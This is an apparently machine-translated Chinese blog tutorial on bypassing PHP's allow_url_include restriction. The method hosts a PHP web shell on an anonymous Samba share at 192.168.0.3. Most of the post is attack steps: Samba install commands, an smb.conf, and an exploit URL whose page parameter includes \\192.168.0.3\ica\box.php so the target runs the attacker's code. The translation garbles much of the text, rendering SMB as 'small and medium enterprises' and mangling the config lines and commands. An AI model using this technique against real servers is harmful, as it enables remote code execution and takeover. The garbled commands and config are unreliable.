使用SMB共享绕过php远程文件中包含的限制来执行RFI利用

在这篇博文中，我将向您展示如何使用PHP应用程序中的远程文件包含漏洞的技术。我们将绕过php远程文件包含的限制，执行RFI利用，即使PHP环境被配置为不包含来自远程HTTP/FTP URL的文件。

PHP和中小型企业共享文件访问

在PHP配置文件中，“allow _ URL _ include”包装默认设置为“Off”，表示PHP不加载远程HTTP或FTP URL，从而防止远程文件包含攻击。但是，即使“允许_url_include”和“允许_url_fopen”都设置为“关”，PHP也不会阻止加载SMB URL。这很可能被滥用来从中小企业共享加载远程托管的PHP Web shell。

攻击场景概述

当易受攻击的PHP应用程序代码试图从攻击者控制的SMB共享中加载PHP Web shell时，SMB共享应该允许访问该文件。攻击者需要在SMB服务器上配置匿名浏览访问权限。因此，一旦易受攻击的应用程序试图从SMB共享访问PHP Web shell，SMB服务器将不需要任何凭据，易受攻击的应用程序将包含Web shell的PHP代码。

首先，我重新配置了PHP环境，并在php.in i文件中禁用了“允许-url-fopen”和“允许-url-include”。之后，配置具有匿名浏览访问的中小型企业服务器。一旦中小企业共享就绪，我们就可以利用易受攻击的应用程序。

PHP环境设置

将托管易受攻击代码的计算机上的“允许”和“允许”设置为“关闭”

下面是版本为“5.5.11”的PHP的当前配置截图：

在继续之前，让我们确保当我们试图访问托管在HTTP上的Web shell时，PHP代码不允许远程文件包含。

如您所见，当我试图从远程主机包含PHP Web shell时，应用程序抛出了一个错误，并且没有包含远程文件。

使用匿名浏览访问配置Samba服务器(Linux机器)使用以下命令安装Samba服务器：

Apt-get install samba创建中小型企业共享目录：

mkdir /var/www/html/pub/

为新创建的中小型企业共享目录配置权限：

chmod 0555/var/www/html/pub/chown-R nobody : nogroup/var/www/html/pub/

运行以下命令删除SAMBA服务器配置文件的默认内容。

Echo /etc/samba/smb.conf将以下内容添加到/etc/samba/smb.conf文件中。

[全局]工作组=WORKGROUPserver字符串=Samba Server %vnetbios名称=in shell-lab security=user map to guest=错误的用户名解析顺序=bcast hostdn s proxy=no bind only interfaces=yes[ICA]path=/var/www/html/Pub可写=no guest ok=yes guest only=yes readonly=yes目录模式=0555force user=nobody现在，重新启动Samba服务器以使配置文件/etc/samba/smb.conf中的新配置生效。

服务smbd重启，成功重启SAMBA服务器后，尝试访问SMB共享并确保SAMBA服务器不需要凭据。

在本例中，SAMBA服务器的IP是192.168.0.3，我需要在Windows文件浏览器中访问SMB共享，如下所示：

\\192.168.0.3\

在中小型企业共享中托管PHP网络外壳

干得好！您可以访问smb共享并显示目录“ica”存在。

现在，PHP shell托管在目录“/var/www/html/pub”中，这是smb共享目录“ica”。

成功托管PHP shell后，我们使用Windows文件浏览器访问SMB共享目录“ica”。

\\192.168.0.3\ica\您可以看到php shell存在于smb共享目录中，这是本例中的box.php文件。

让我们使用这个php shell SMB链接和易受攻击的php代码来浏览它。

http://易损_application/page.php？page=\ \ 192 . 168 . 0 . 3 \ ICA \ box . PHP PHP易受攻击的代码从SMB共享中获取web shell，并在应用程序服务器上执行该代码\m/。我们已经绕过了php远程文件的限制，包含了托管在远程主机上的Web shell。

摘要

以上是边肖引入的SMB共享的使用，以绕过php远程文件中包含的限制来实现RFI。希望对大家有帮助。如果你有任何问题，请给我留言，边肖会及时回复你。非常感谢您对我们网站的支持！